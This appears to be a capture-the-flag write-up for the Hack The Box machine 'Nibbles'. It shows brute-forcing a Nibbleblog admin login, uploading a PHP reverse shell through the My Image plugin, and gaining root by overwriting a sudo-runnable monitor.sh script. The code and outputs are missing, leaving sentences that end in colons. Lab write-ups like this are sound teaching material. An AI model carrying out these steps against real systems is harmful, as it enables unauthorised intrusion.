http://10.10.10.75/
brings us to a page simply saying Hello World!
, but after looking at the page source we see the following:http://10.10.10.75/nibbleblog
and find a web page ran on a product named Nibbleblog
. Let's dig a little deeper into this site with a gobuster scan:nibbleblog/README
is a great place to find versioning information and nibbleblog/admin.php
will generally give us a chance to attack an admin login page. Starting with nibbleblog/README
we see the following at the top of the file:nibbleblog/admin.php
. As expected, we find a login page. After a quick google didn't bring up a set of default credentials I'll use hydra to brute force the login with the username admin
. To see what's really going on with this form, we start up our Burp Suite proxy and submit a test login attempt to see how the data is being sent. Shown below is the captured login attempt:admin:nibbles
. Just to satisfy my own curiosity, I verified that the password nibbles
would in fact have been found by my hydra scan if we weren't blacklisted :).My image
to upload a php file and then execute it at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
. Instead of using metasploit for this, I prefer to exploit it on my own. First we'll need a reverse shell to upload. To do this we'll use msfvenom
to generate the payload:tunip
is a handy bash alias I use to get my current IP address for Hack The Box. it is set to ifconfig tun0 | sed -n '2 p' | awk '{print \$2}'
in my ~/.bash_aliases
Save Changes
you'll get some error messages, but this isn't a problem. Navigating to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
triggers our reverse shell on port 31337
. With this we are able to get the user flag:nibbler
's home directory gives us a personal.zip
file. Using unzip
we can decompress this file and discover a file personal/stuff/monitor.sh
which looks to be a custom monitoring script. Following my usual steps, I then run sudo -l
to see if we have passwordless sudo access to anything:/home/nibbler/personal/stuff/monitor.sh
with sudo permissions without supplying a password. To exploit this I'm simply going to overwrite that file with a bash reverse shell back to my Kali host on a different port. To do this I'll run the following:monitor.sh
with a reverse shell, then executes that reverse shell with root privileges. With this we are able to read the root flag: